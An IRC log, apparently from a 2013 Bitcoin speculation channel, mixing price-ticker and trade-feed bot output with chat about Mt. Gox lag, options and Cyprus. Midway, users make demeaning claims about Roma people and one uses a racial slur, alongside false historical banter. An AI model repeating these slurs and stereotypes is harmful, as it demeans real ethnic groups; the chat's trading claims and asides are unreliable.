BTC [-] Mar 27 10:14:42 http://motherboard.vice.com/blog/the-worlds-first-bitcoin-atm-to-dispense-cyprus-bills Mar 27 10:15:40 #bitcoin-speculation Mar 27 10:15:42 or something Mar 27 10:15:43 ok? Mar 27 10:16:03 I want to invest in the company making bitcoin atms. Mar 27 10:16:18 me too Mar 27 10:16:21 i sent them an email Mar 27 10:16:28 haven't heard back from them yet Mar 27 10:19:02 heya Enky Mar 27 10:19:09 hi Mar 27 10:19:43 ;;ticker Mar 27 10:19:43 BTCUSD ticker | Best bid: 86.30643, Best ask: 86.97999, Bid-ask spread: 0.67356, Last trade: 86.30643, 24 hour volume: 75359.24546426, 24 hour low: 75.20000, 24 hour high: 86.97748, 24 hour vwap: 79.38315 Mar 27 10:19:51 #bitcoin-analysis has some chart jockeys Mar 27 10:20:20 i have my personal chart jockey Mar 27 10:20:25 2 more days until ianbakewell's scam of truth Mar 27 10:21:57 eh... Mar 27 10:22:04 600 BTC loaned to short them... Mar 27 10:22:14 I loaned 280 BTC Mar 27 10:22:21 thank god I didn't short them... Mar 27 10:22:25 fastcash4bitcoins is out of funds Mar 27 10:22:26 They're doing well Mar 27 10:22:35 ;;ticker Mar 27 10:22:36 BTCUSD ticker | Best bid: 86.40000, Best ask: 87.60000, Bid-ask spread: 1.20000, Last trade: 87.69990, 24 hour volume: 75777.12278574, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 79.42575 Mar 27 10:22:50 mtgox hasn't credited my BTC deposit for 8 hours Mar 27 10:22:51 87.70000 high Mar 27 10:22:56 argh Mar 27 10:22:58 Bugpowder fiat or btc Mar 27 10:23:05 btc Mar 27 10:23:05 are there calls for sale? Mar 27 10:23:06 BTC Mar 27 10:23:13 [BTCTC] [GSDPT] 15 @ 0.00449 = 0.0674 BTC [-] Mar 27 10:23:13 nope, no calls Mar 27 10:23:16 dang Mar 27 10:23:17 i mean the fastcash4bitcoins Mar 27 10:23:17 I got like 1600 Mar 27 10:23:20 calls Mar 27 10:23:26 is he out of fiat or out of btc Mar 27 10:23:33 fastcash isout of fiat Mar 27 10:23:39 ah Mar 27 10:23:46 [BTCTC] [GSDPT] 7 @ 0.00458 = 0.0321 BTC [+] Mar 27 10:23:47 he may have just turned off the sales though Mar 27 10:23:50 I cashed out 100 Mar 27 10:23:58 and couldn't cash any more Mar 27 10:24:39 bugpowder: actually Mar 27 10:24:51 there was like a set of options with less than 1000 put up Mar 27 10:24:54 then nothing Mar 27 10:25:04 I think it's just out of funds. Mar 27 10:25:05 there are options Mar 27 10:25:24 but some strikes are sold out Mar 27 10:25:38 look the asks, they're not 1000s stacks Mar 27 10:25:45 and some have been sold out for a while Mar 27 10:25:52 Some are a few hundres or less Mar 27 10:25:55 Out of funds Mar 27 10:26:01 Too much calls bought Mar 27 10:26:06 [BTCTC] [GSDPT] 18 @ 0.00459 = 0.0826 BTC [+] Mar 27 10:26:47 Yah 610s-750s are sold out Mar 27 10:26:52 "Thank you for your email. It appears that due to network congestion there is a Lag and this should be rectified in the next 24hrs and we will keep you updated on the status and we apologize for the inconvenience that this may have caused. Let us know if you would require any further assistance regarding this issue." Mar 27 10:27:15 well at least they sent an email reply in < 5 minutes Mar 27 10:27:20 even if the answer is bullshit Mar 27 10:27:45 I'm starting to think 100 is in play this week Mar 27 10:29:00 triple digits eh Mar 27 10:29:14 or move to single digits again Mar 27 10:29:19 0.01 = 1 Mar 27 10:30:15 how much of this price rise is due to "network lag" at mtgox deposits. Mar 27 10:30:31 probably most of it Mar 27 10:30:43 what's the price gonna do if deposits aren't credited? Mar 27 10:30:57 rise until they are Mar 27 10:31:01 then flashcrash Mar 27 10:31:07 exactly Mar 27 10:31:09 then bounce Mar 27 10:31:19 mtgox is fucking great for volatility Mar 27 10:31:31 something breaks pretty much every day Mar 27 10:32:13 [BTCTC] [ASICMINER-PT] 2 @ 0.7 = 1.4 BTC [+] Mar 27 10:32:15 [BTCTC] [ASICMINER-PT] 3 @ 0.7 = 2.1 BTC [+] Mar 27 10:34:05 [BTCTC] [PAJKA.BOND] 1 @ 0.09 BTC [-] Mar 27 10:34:28 heh .. nailed it Mar 27 10:35:46 funded Mar 27 10:36:28 [MPEX] [O.BTCUSD.C490N] 1 @ 0.54019864 BTC [+] Mar 27 10:37:54 getting eaten Mar 27 10:38:00 so funny Mar 27 10:38:06 it was mee Mar 27 10:38:10 it sits there for 60 confirms Mar 27 10:38:23 can anyone tell me what the breakeven price for those options are? Mar 27 10:38:33 which ones? Mar 27 10:38:38 i thought i worked it out to be around $93 but not sure Mar 27 10:38:43 O.BTCUSD.C490N Mar 27 10:39:23 ;;calc (93-49)/93 Mar 27 10:39:23 0.47311827957 Mar 27 10:39:39 ;;calc (104-49)/104 Mar 27 10:39:39 0.528846153846 Mar 27 10:39:46 ;;calc (106-49)/106 Mar 27 10:39:46 0.537735849057 Mar 27 10:39:56 About $107 Mar 27 10:40:04 oh ok Mar 27 10:40:06 thanks Mar 27 10:40:54 !last h vtx Mar 27 10:40:54 Last trade for VTX on HAVELOCK was at 0.6 BTC [+] Mar 27 10:41:07 !last m s.dice Mar 27 10:41:08 Last trade for S.DICE on MPEX was at 0.00448 BTC [-] Mar 27 10:41:17 ;;ticker Mar 27 10:41:17 BTCUSD ticker | Best bid: 85.00013, Best ask: 85.03269, Bid-ask spread: 0.03256, Last trade: 85.50000, 24 hour volume: 76866.50921262, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 79.54180 Mar 27 10:41:40 ;;ticker Mar 27 10:41:41 BTCUSD ticker | Best bid: 85.00013, Best ask: 85.03269, Bid-ask spread: 0.03256, Last trade: 85.50000, 24 hour volume: 76866.50921262, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 79.54180 Mar 27 10:41:48 ;;goxlag Mar 27 10:41:49 42.979658 seconds Mar 27 10:41:53 there we go Mar 27 10:42:21 panic buy :/ Mar 27 10:44:11 64 coins left Mar 27 10:44:43 all gone! Mar 27 10:44:48 ok Mar 27 10:44:54 now I can buy my Tesla Mar 27 10:45:05 or A7/S7 Mar 27 10:45:12 dump Mar 27 10:45:21 Thank you bitcoin! Mar 27 10:45:22 someone dumped to 84.50 Mar 27 10:45:30 It's gonna dump more right now Mar 27 10:45:38 ur dumping? Mar 27 10:46:04 no I'm out of coins on gox again Mar 27 10:46:07 just dropped 300 Mar 27 10:46:12 oh lol, that was you Mar 27 10:46:34 but there was a BTC funding lag of 8 hours for me Mar 27 10:46:47 buy back at 90 Mar 27 10:46:53 maybe they are clearing the pipe for everyone Mar 27 10:46:59 I'm not buying Mar 27 10:47:07 so you're odne with btc? Mar 27 10:47:15 hell no! Mar 27 10:47:27 why buy btc when you can buy calls? Mar 27 10:47:30 :-P Mar 27 10:48:15 dump Mar 27 10:48:16 84 Mar 27 10:52:07 glad I got up to check my shit Mar 27 10:52:13 in the middle of the night Mar 27 10:53:37 [MPEX] [S.MPOE] 7132 @ 0.00061483 = 4.385 BTC [-] Mar 27 10:53:38 [MPEX] [S.MPOE] 8100 @ 0.00060977 = 4.9391 BTC [-] Mar 27 10:53:40 [MPEX] [S.MPOE] 1000 @ 0.00060523 = 0.6052 BTC [-] Mar 27 10:53:43 [MPEX] [S.MPOE] 15000 @ 0.00060101 = 9.0152 BTC [-] Mar 27 10:53:45 [MPEX] [S.MPOE] 10944 @ 0.00060001 = 6.5665 BTC [-] Mar 27 10:55:45 it's moving back up tho Mar 27 10:57:38 i guess Mar 27 10:58:10 i wonder whats thew price in a week Mar 27 11:00:54 [MPEX] [O.BTCUSD.C630T] 10 @ 0.27399999 = 2.74 BTC [+] Mar 27 11:01:04 its 90 dollars on canadian bitcoins Mar 27 11:01:06 hehe Mar 27 11:02:26 mpoe bondholders are going to get slaughtered Mar 27 11:02:54 mpoe will be fine Mar 27 11:03:07 unless this makes future bondholders skittish Mar 27 11:03:28 this rally is so freaking strong Mar 27 11:03:47 you mean mpex Mar 27 11:04:11 nah Mar 27 11:04:32 you underestimate the tenacity of mp Mar 27 11:04:50 its a superior platform Mar 27 11:05:28 Not interested in wasting sleep explaining it Mar 27 11:05:35 later dudes. Mar 27 11:05:39 $$$ Mar 27 11:08:14 others tried but were not allowed... Mar 27 11:08:22 BitVPS was... SatoshiDice was... Mar 27 11:09:39 I have a friend who bought on march 10.. 3 BFL singles Mar 27 11:09:50 I just told him cancel his BFL orders, they seem scammy as fuck Mar 27 11:09:54 did I do good? Mar 27 11:10:05 or am i depriving him of riches Mar 27 11:12:38 http://betsofbitco.in/item?id=470 Mar 27 11:20:58 yes.. yes of course. even if bfl ships, the backlog is insane Mar 27 11:21:12 that he'll get his, idk. 9 months from now Mar 27 11:21:17 and im being generous Mar 27 11:22:06 in other news Mar 27 11:22:07 http://imgur.com/u3znNg8 Mar 27 11:22:15 silver gets a smack in the face Mar 27 11:39:02 [HAVELOCK] [SDICE] 4 @ 0.474998 = 1.9 BTC [+] Mar 27 11:39:03 [HAVELOCK] [SDICE] 4 @ 0.4749996 = 1.9 BTC [+] Mar 27 11:44:01 [HAVELOCK] [KCIM] 2 @ 1.19 = 2.38 BTC [+] Mar 27 11:44:53 http://i.imgur.com/dXhjpHk.jpg Mar 27 11:45:01 great dog story Mar 27 11:46:34 hi all...coinbr really shows different options prices, will dig it Mar 27 11:49:09 Namworld so BitVPS "tried but not allowed" to list on mpex, orly ???? Mar 27 11:49:38 or what did you mean? Mar 27 11:50:01 [HAVELOCK] [SDICE] 2 @ 0.475 = 0.95 BTC [+] Mar 27 11:52:54 BitVPS was allowed... Mar 27 11:53:20 [05:08] BitVPS was... SatoshiDice was... Mar 27 11:53:25 Both were on MPEx Mar 27 11:53:35 Now only S.DICE remains Mar 27 11:59:09 http://www.businessspectator.com.au/article/2013/3/27/technology/bitcoin-gains-cyprus-pain Mar 27 11:59:55 correlation != causation ... Mar 27 12:00:11 Thank you Mar 27 12:02:00 saulimus: Are you saying that eurowoes have no impact on btc/fiat ratios? (Or where you talkign to someone else?) Mar 27 12:03:48 I will say that there is a storm of press coming on btc.. http://www.fool.com/investing/general/2013/03/26/a-short-guide-to-understanding-bitcoins.aspx Mar 27 12:04:18 "The main concern I have with Bitcoins is it's potential ability to be hacked (and then counterfeited). If this did occur, then the value of Bitcoins would ultimately become zero, Read more: http://www.businessspectator.com.au/article/2013/3/27/technology/bitcoin-gains-cyprus-pain#ixzz2OjVtRtDJ" Mar 27 12:04:32 damn Mar 27 12:06:44 still 5000 waiting for MT gox confirmation Mar 27 12:07:00 100$ buy friday ? Mar 27 12:07:20 +10$ the last 24h Mar 27 12:07:23 bgupta, I'm saying it's more probable that the price of bitcoin would've risen the same way had the cyprus situation not happened. articles like that make it seem like it's the only reason... because it's the writer's job to find interesting connections. Mar 27 12:08:32 FINCEN effect, more than Cyprus imo Mar 27 12:10:07 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 27 12:10:11 so i go afk for an hour and we go over 87.7 lol Mar 27 12:10:39 bids and asks are thin Mar 27 12:15:51 [BTCTC] [ASICMINER-PT] 5 @ 0.7 = 3.5 BTC [+] Mar 27 12:22:17 bgupta w3ashington post did a good one too Mar 27 12:22:50 yeah people are saying cyprus but its not... its FINCEN for sure Mar 27 12:23:11 but who cares, people going to just expect btc to go way up everytime a bank fail so that if okay with me Mar 27 12:23:20 should happen every other mopnth in europe alone Mar 27 12:23:32 It's a combination of things creating a feedback loop… Mar 27 12:24:05 yeah and that is why i love btc Mar 27 12:24:17 only 21 million evar and everyone wants them all Mar 27 12:24:18 muhahahahahaha Mar 27 12:24:42 The one question I have is if some large entity, gov't or financial, decided to bet against bitcoin, how effective could they be? I mean are there enough available for loan to really do a big short? Mar 27 12:25:13 bet against? lol no, maybe attack Mar 27 12:26:07 well.. in traditional markets selling short is selling.. and can stompt out any rallies, if a large enough position is taken. Mar 27 12:28:19 ?? I can't find many merchants that take litecoin? Mar 27 12:28:36 tiberslav oh lol Mar 27 12:28:38 ever the pessimist Mar 27 12:28:49 you can get run over by a bus too tomorrow Mar 27 12:29:11 tiberslav is just sad he only has .24 btc he scammed in nigeria Mar 27 12:29:34 i hold 100k ltc so good Mar 27 12:29:38 tiber Mar 27 12:29:42 how much btc do u have Mar 27 12:29:52 and at what price did you sell at Mar 27 12:30:04 lol Mar 27 12:30:07 xd Mar 27 12:30:12 hahahahhahahhaha lol Mar 27 12:30:22 hahahahahhhhhhhhhhhhhhhhhhhhhhahahahahahaahahah my fucking sides Mar 27 12:30:29 oh god. Mar 27 12:30:30 lol Mar 27 12:30:41 proof? Mar 27 12:30:50 tiberslav no one in their right mind would think you had more than 2 btc Mar 27 12:31:01 lol Mar 27 12:31:11 look dude you are trading pennies for dollars Mar 27 12:31:19 get in now, it hurts but you must accept the fact Mar 27 12:31:24 you will thank me later Mar 27 12:31:40 you will wish you bought $100 worth at 90 dollars per btc Mar 27 12:31:58 tiberslav tiverslav you made me laugh outlouad so hard everyone is looking at me like im nuts now Mar 27 12:32:00 look its okay if you sold Mar 27 12:32:07 you can get in now :) Mar 27 12:32:11 still cheap Mar 27 12:33:19 chang Mar 27 12:34:27 oh well Mar 27 12:34:55 I'm thinking this run of publicity has a bit more legs in it.. however.. not a bad strategy… I sold most ages ago… but kept a few just in case of events like this happening. (fiat woes) It's the same reason I have some gold coins in my safety deposit box. Mar 27 12:35:00 [HAVELOCK] [SDICE] 3 @ 0.475 = 1.425 BTC [+] Mar 27 12:35:55 ;;ticker Mar 27 12:35:55 BTCUSD ticker | Best bid: 85.96112, Best ask: 86.00000, Bid-ask spread: 0.03888, Last trade: 86.00000, 24 hour volume: 76550.92089328, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 80.04172 Mar 27 12:36:28 well you have a 50% shot at being right. :) Mar 27 12:36:54 bgupta thats not how it works Mar 27 12:36:54 lol Mar 27 12:37:58 off guard Mar 27 12:38:17 really, I thought mpex allowed that for some reason? Mar 27 12:38:37 ohh.. Mar 27 12:39:13 a lot is becoming clearer. Mar 27 12:39:40 I assumed that by now shorting would have become a regular part of the economy.. Mar 27 12:40:08 It's not really shorting if you can't borrow stuff and dump it. Mar 27 12:41:37 got it.. need to think if options could have any impact on that… what about futures contracts? DO we have those? Mar 27 12:41:41 swaps and such? Mar 27 12:45:43 well that's only an issue due to spreads, right? Mar 27 12:46:03 if you are patient.. you should be able to move in and out, without such a spread no? Mar 27 12:46:44 ah I see your point. Mar 27 12:47:00 it's for the large $$$ transactions that kill you. Mar 27 12:48:22 but also 95% of the community aren't rushing for the exits.. the things that really shook the price back in the day where theives stealing wallets and dumping them for fiat. Mar 27 12:49:17 tiberiusiv: depending on who they are, would determine whether that is a good thing or a bad thing. Mar 27 12:49:28 unfortuantely we have no way of knowing Mar 27 12:49:50 I understand that problem. Mar 27 12:50:12 yeah.. Mar 27 12:50:41 they are speculator in BTC land, at some point they will cash out ! no dout Mar 27 12:50:56 there are speculators in every land Mar 27 12:51:25 brb Mar 27 12:53:34 [BTCTC] [BASIC-MINING] 1 @ 0.34999 BTC [+] Mar 27 12:56:23 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 27 12:59:28 so I had a theory back in the day.. that there are a large amount of coins held by a handful of folks who are acting as guardians of the btc economy… Mar 27 12:59:39 I suspected that as the price went up they would slowly move some of their holdings into fiat, to be able to buy on any major pullbacks.. (That's what I would do if I was a creator of this currency.) Mar 27 13:01:18 they wouldn't have had to sell off much to act as market makers.. Mar 27 13:01:40 yes, there are whales. but would they use mpex for hedging or sdice for fun? never! (at least according to our tibby) Mar 27 13:01:54 tibby? Mar 27 13:02:39 i know what happens on coinbr and that they *do* use mpex Mar 27 13:02:48 [BTCTC] [ASICMINER-PT] 69 @ 0.7 = 48.3 BTC [+] Mar 27 13:02:56 just don't give a fuck about convicing some kid Mar 27 13:03:53 So your balance is like 10k+ or something? Mar 27 13:04:06 (catching up on the log) Mar 27 13:04:12 i think tiber is just a troll Mar 27 13:04:32 don't feed him Mar 27 13:04:38 lol tibby completely misunderstood me Mar 27 13:05:13 I thought feeding a troll was getting angry/pissed, since it gives a troll's statisfaction? Mar 27 13:05:45 nah, giving them attention is enough for tiber Mar 27 13:05:45 Bowjob is all-in bullish as far as I know. Mar 27 13:05:48 my word on whole mpex issue is here: https://bitcointalk.org/index.php?topic=102333.msg1665040#msg1665040 Mar 27 13:05:54 i'm not gonna repeat it Mar 27 13:06:01 nah, i still have plenty of fiat Mar 27 13:06:49 hey, I can't claim to know what btc is gonna do… I have a very small position that I plan to keep in the btc economy.. Mar 27 13:07:23 my goal is to get more btc than I had before. Mar 27 13:07:31 I actually took a credit to buy BTC at 5 USD/BTC Mar 27 13:07:34 (Without converting any fiat into btc) Mar 27 13:07:48 Although only a few thousands, nothing I wouldn't have been able to repaid. Mar 27 13:08:45 SatoshiDice is a sure way to lose Mar 27 13:09:04 I don't have a lot of btc, so my trades can easily be absorbed by the market. Mar 27 13:09:11 I'm worried about people putting their life savings/maxing credit into Bitcoins at current prices... right after such a steep rise. Mar 27 13:09:33 I'm afraid to buy as well Mar 27 13:09:41 tiber you're recomending "proper bet sizing".. Mar 27 13:09:44 you're retarded Mar 27 13:09:47 Every time I put a few BTC on satoshidice, it's been a lost. Just for fun. Mar 27 13:09:58 I've pulled out great profit trading instead however Mar 27 13:10:14 (Havelock, BTCT.co, MPEx, Bitfunder, MtGox) Mar 27 13:10:16 bgupta, if you want moar btc,don't exchange. earn them Mar 27 13:10:31 earn them? Mar 27 13:10:37 bgupta you will lose at dice Mar 27 13:10:43 there IS a bitcoin economy, just it's not so advertised and force fed like real one Mar 27 13:10:56 Don't worry.. I am not gonna be playing dice. Mar 27 13:11:00 or program or graphics. or alpaca soicks Mar 27 13:11:06 or swiss chocolate Mar 27 13:11:14 find ur niche Mar 27 13:11:21 You can sell services of all sorts... does the work too Mar 27 13:11:44 tiberiusiv maybe. but swiss chocolate for btcs DOES sell quite well and that matters. Mar 27 13:11:45 of you are talking darknet.. I think a good side business would be a paper currency moneychanger. Mar 27 13:12:29 I know people are looking to get btc without dealing with the exchanges.. Mar 27 13:12:34 1. goto bitcointalk Mar 27 13:12:39 2. search cocolate Mar 27 13:12:56 what they do with the btc, I can only imagine.. ;) Mar 27 13:13:20 tiberiusiv you're not the only one who can say just google it, ya know Mar 27 13:13:31 We don't have link off the top of our head for everything, silly you. There's hundreds of BTC businesses. Mar 27 13:14:12 tiberiusiv now *this* needs a link Mar 27 13:14:20 or it's just FUD Mar 27 13:15:08 tiberiusiv: which forum in particular? Mar 27 13:15:12 ofc. if they used fiat, they'd have the saem problem to aluder it Mar 27 13:15:27 err.. there are like 20 fourms Mar 27 13:15:29 [BTCTC] [BTC-BOND] 1 @ 0.009994 BTC [+] Mar 27 13:15:51 on that one, I'd be with tiberius... cashing out must be harder for dealers. Cash can come in fast. Cashing out without going through an exchange can be hard. Mar 27 13:16:03 If they want to avoid linking a bank account... Mar 27 13:16:12 once they want to convert thousands of btcs it's exactly the same issue Mar 27 13:16:21 (Assuming they don't trust SR itself) Mar 27 13:16:32 No, I disagree with a lot of what you say so... Mar 27 13:17:08 tiberiusiv i don't know why you care so much to SR Mar 27 13:17:45 my business is legit, i don't have a problem providing id to bitcoin-central and cashing out at price consistently few euros above market Mar 27 13:18:06 and report the earnigns to be taxed Mar 27 13:18:21 what liquidity do you need? Mar 27 13:18:38 [BTCTC] [ASICMINER-PT] 21 @ 0.7 = 14.7 BTC [+] Mar 27 13:18:41 [BTCTC] [ASICMINER-PT] 14 @ 0.7 = 9.8 BTC [+] Mar 27 13:19:07 for converting few hundred euros to live off every while it has ample liquidity Mar 27 13:19:30 i don't need move thousands of btcs like these poor silkroaders Mar 27 13:19:32 hmm... slight wall building up at 86 USD per BTC... price approaching all time high again Mar 27 13:19:37 yes, slovakia Mar 27 13:20:25 lol Mar 27 13:20:26 [BTCTC] [ASICMINER-PT] 6 @ 0.7 = 4.2 BTC [+] Mar 27 13:21:00 [BTCTC] [ASICMINER-PT] 1 @ 0.715 BTC [+] Mar 27 13:21:06 nobody scammed you? Mar 27 13:22:01 they were all around yurp before wwii Mar 27 13:22:10 they just got wiped out elsewhere Mar 27 13:23:23 and in recent decades they breed much faster than "whites"... so slovakia will prolly become a gypsy country soon Mar 27 13:24:05 lol Mar 27 13:24:18 another person who thinks gypsy is a race and not a mythological creature Mar 27 13:24:19 were you eating at restaurants? cuz slovaks don't give a shit about services Mar 27 13:24:45 Diablo-D3: how do you call these chocolate people then? roma? Mar 27 13:25:11 dude, if they're _chocolate_ I call them african Mar 27 13:25:30 unless they're some of those really dark indians Mar 27 13:25:51 1. these gypsies look like indians 2. they speak like indians 3. wtf are they then? Mar 27 13:28:28 cuz i'm registered entrepreneur (even VAT registered). so they have a right to look into my accts anytime Mar 27 13:28:32 am going up:) Mar 27 13:28:34 nice Mar 27 13:29:30 ;;ticker Mar 27 13:29:31 BTCUSD ticker | Best bid: 87.00000, Best ask: 87.16999, Bid-ask spread: 0.16999, Last trade: 87.00000, 24 hour volume: 76848.95819924, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 80.37796 Mar 27 13:29:53 nice! Mar 27 13:32:06 jurov: speaking indian isn't a useful description Mar 27 13:32:20 there is something like 5 major languages spoken on the indian subcontinent Mar 27 13:32:36 but if they look like indians and speak an indian language, they might be, you know, indians Mar 27 13:33:05 i can speak a bit of charakee Mar 27 13:33:28 Chaang-Noi: indian from india dude Mar 27 13:33:33 they are some lowest indian caste that got expelled in 12th century. Mar 27 13:33:43 and they call themselves gysies or rome Mar 27 13:33:46 and its spelled Cherokee Mar 27 13:33:47 *roma Mar 27 13:34:04 roaming around eur since then Mar 27 13:34:11 jurov: Ive never seen a "gypsy" that looks indian Mar 27 13:34:47 http://en.wikipedia.org/wiki/Romani_people guys read first para Mar 27 13:34:50 http://www.aktuality.sk/clanok/217087/obcania-protestovali-proti-stahovaniu-romov-z-letanovskej-osady/ Mar 27 13:35:00 ^ slovak roma seen here Mar 27 13:35:24 D3 i just trollin:) Mar 27 13:35:40 if they don't resemble indians, then dunno Mar 27 13:36:04 "The Romani are an ethnic group living mostly in Europe, who have been traced genetically to a group migrating from the northwestern Indian Subcontinent about 1,500 years ago." Mar 27 13:36:08 i was in india, in kashmire and they have people with blue eyes and light skin Mar 27 13:36:38 Chaang-Noi: probably ex-nazis from ww2 Mar 27 13:36:59 hungarians are from north west china... from 2000 years ago Mar 27 13:37:23 Chaang-Noi: hell, thats nothing new Mar 27 13:37:31 d3 lol no, there is a group in afghan/packastian/india that came from alaxander the great when he came down 2500 eyars ago Mar 27 13:37:49 one of the 12 kinds of chinese seems to be descended by a bunch of romans that followed the silk road the whole way dow Mar 27 13:37:51 they be musliumz mostly now Mar 27 13:38:13 no roman in recorded history ever made it to china Mar 27 13:38:19 or chinese to rome Mar 27 13:38:32 not saying it did not happen but no one wrote about it, that survives Mar 27 13:38:41 Chaang-Noi: they have roman artifacts, but they're not sure if the artifacts alone made it Mar 27 13:38:43 im a history dude way more than anything else:) Mar 27 13:38:53 rome did trade with china Mar 27 13:39:19 and I forgot about alexander the great, btw Mar 27 13:39:32 he is my nigger! Mar 27 13:39:40 dude, he is nobody's nigger Mar 27 13:39:45 hes more made up than anything else Mar 27 13:39:47 got to india, saw a line of elephants and was like... ummm, lets go home Mar 27 13:40:20 alaxander is just like santa clause, tricks we play on history 101 students Mar 27 13:40:27 we all know he is a made up guy Mar 27 13:41:01 brb Mar 27 13:41:48 I mean, fuck, he had an empire that spanned from greece to india Mar 27 13:41:51 thats just impossible. Mar 27 13:42:38 he did not really have an emipre... he just raped everything he came to until india... he also took over the empires in his way leaving most of the govt there, just killing the kinds and marrying the exwifes Mar 27 13:42:45 tiberslave the 7th pope Mar 27 13:43:01 Chaang-Noi: yeah, pretty much Mar 27 13:43:10 d3 if you know how he did it, it is very reasonable Mar 27 13:43:17 [MPEX] [S.DICE] 1000 @ 0.00415005 = 4.1501 BTC [-] Mar 27 13:43:18 [MPEX] [S.DICE] 1000 @ 0.00415004 = 4.15 BTC [-] Mar 27 13:43:29 he just kept adding to his army as he beat other ones, sooner or later the other guys just sureendered Mar 27 13:43:46 but its pretty much embedded into every white guy now: fear anyone from greece that has an army of macedonians behind them Mar 27 13:43:48 but once he got to india he got an army of like all of india, with massive elehpants and shit Mar 27 13:44:05 95% of his army at the end was not macidonian Mar 27 13:44:12 https://bitcointalk.org/index.php?topic=159462.0 Mar 27 13:44:14 you missed the point Mar 27 13:44:21 also he was not greek, Mar 27 13:44:25 chang, check it Mar 27 13:44:37 still not sure if its a good idea or not Mar 27 13:44:38 mhm Mar 27 13:44:53 using paypal? might be a good idea? hahahahha Mar 27 13:44:59 fuck banks and esp fuck paypal Mar 27 13:45:07 no dude you're missing the point Mar 27 13:45:08 lol Mar 27 13:45:29 [MPEX] [S.DICE] 1000 @ 0.00415003 = 4.15 BTC [-] Mar 27 13:45:30 [MPEX] [S.DICE] 835 @ 0.00415001 = 3.4653 BTC [-] Mar 27 13:45:34 i see paypal and brian shuts down, fuck paypal man Mar 27 13:46:37 Chaang-Noi: yes, but macedonia no longer exists Mar 27 13:46:38 brian Mar 27 13:46:40 lol Mar 27 13:47:00 get a brian moran Mar 27 13:47:42 :) Mar 27 13:53:20 [BTCTC] [ASICMINER-PT] 10 @ 0.714995 = 7.15 BTC [-] Mar 27 13:53:23 [BTCTC] [ASICMINER-PT] 1 @ 0.715 BTC [+] Mar 27 13:54:41 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [-] Mar 27 14:00:39 [BTCTC] [PAJKA.BOND] 1 @ 0.107499 BTC [+] Mar 27 14:04:19 [BTCTC] [GOLD] 1 @ 0.1922 BTC [-] Mar 27 14:05:24 [BTCTC] [GSDPT] 15 @ 0.00414 = 0.0621 BTC [-] Mar 27 14:05:25 [BTCTC] [GSDPT] 110 @ 0.00413 = 0.4543 BTC [-] Mar 27 14:05:28 [BTCTC] [GSDPT] 54 @ 0.00412 = 0.2225 BTC [-] Mar 27 14:05:45 [BTCTC] [ASICMINER-PT] 2 @ 0.6986 = 1.3972 BTC [-] Mar 27 14:06:41 Eurozone Chief: Savings accounts in Spain, Italy and other European countries will be raided if needed Mar 27 14:06:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19257 BTC [-] Mar 27 14:06:50 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1925 BTC [-] Mar 27 14:12:28 ;;tocler Mar 27 14:12:28 Error: "tocler" is not a valid command. Mar 27 14:12:30 ;;ticker Mar 27 14:12:32 BTCUSD ticker | Best bid: 85.63544, Best ask: 85.65000, Bid-ask spread: 0.01456, Last trade: 85.65000, 24 hour volume: 77073.18838681, 24 hour low: 75.20000, 24 hour high: 87.70000, 24 hour vwap: 80.52340 Mar 27 14:12:37 ;;goxlag Mar 27 14:12:37 13.583927 seconds Mar 27 14:14:00 ;;bids 0 Mar 27 14:14:03 There are currently 36640973 bitcoins demanded at or over 0.0 USD, worth 9691361.22066 USD in total. | Data vintage: 0.0182 seconds Mar 27 14:14:11 still going up Mar 27 14:14:56 lag or price? Mar 27 14:15:03 total USD in bids Mar 27 14:15:14 a proxy for the amount of money sittingn in gox accounts Mar 27 14:15:19 that has not be used yet Mar 27 14:15:26 I have never seen it this high. Mar 27 14:15:37 9$.7M Mar 27 14:15:42 $9.7M Mar 27 14:15:59 interesting idea Mar 27 14:16:06 ;;asks 100000000 Mar 27 14:16:09 There are currently 47942.779 bitcoins offered at or under 100000000.0 USD, worth 363654447.184 USD in total. | Data vintage: 0.0028 seconds Mar 27 14:16:14 that is less informative Mar 27 14:16:15 Anybody knows how often Jurov processes CoinBR withdrawals? Mar 27 14:16:42 50k on gox lol Mar 27 14:16:51 not often enough Mar 27 14:16:57 There is definitely more than 50k sitting in dark pools on gox Mar 27 14:17:12 no automation for even the smallest withdrawls... Mar 27 14:17:18 although there may be an extra 10M USD in dark pools too Mar 27 14:17:36 pgp security or convienence, pick one. Mar 27 14:17:40 gox be playing wiht all the stolen bitcoinica money Mar 27 14:18:33 !ticker m s.dice Mar 27 14:18:34 [MPEX:S.DICE] 1D: 0.00415001 / 0.00440089 / 0.00449999 (16048 shares, 70.63 BTC), 7D: 0.00320003 / 0.0043828 / 0.005598 (277727 shares, 1,217.22 BTC), 30D: 0.00300001 / 0.0052747 / 0.0063799 (1198162 shares, 6,319.96 BTC) Mar 27 14:20:12 fastcash funds are back Mar 27 14:21:15 Meh, I already sign with a BTC-adress to withdraw from CoinBR, it's a bit annoying Mar 27 14:22:02 tru Mar 27 14:22:36 Let's hope it gets through before the price correction# Mar 27 14:22:51 I don't think there will be a correction before friday Mar 27 14:23:20 the total gox bids keep going up Mar 27 14:23:36 *sigh* Mar 27 14:23:43 before the crash last friday, total gox bids dropped from 8.1M to 6.1M Mar 27 14:23:53 another BitVPS client which paid with a stolen Paypal account. Mar 27 14:24:07 cut yourself free of fiat money Mar 27 14:24:08 I sold off my calls for a 3x gain. Rebought at the bottom. Mar 27 14:24:15 nice Mar 27 14:24:28 preach it brother Mar 27 14:25:02 Bugpowder: i exercised at 71 :( Mar 27 14:25:05 Anyway.... watch the gox bids. I think it may be a leading indicator of corrections Mar 27 14:25:17 MJR_: why did you exercise? Mar 27 14:25:19 correction upwards? Mar 27 14:25:59 Bugpowder: neat. Gains on a significant amount of BTC? Mar 27 14:26:50 ;;bc,24hprc Mar 27 14:26:51 80.51 Mar 27 14:28:00 man... Mar 27 14:28:06 all the options are too expensive... Mar 27 14:28:15 need some like 110 calls :( Mar 27 14:29:54 hmmm Mar 27 14:29:59 Namworld: Had 10% of my nut in calls. they tripled. Sold... Rebought with the profits at the bottom of the weekend dip vwap. Best month ever. 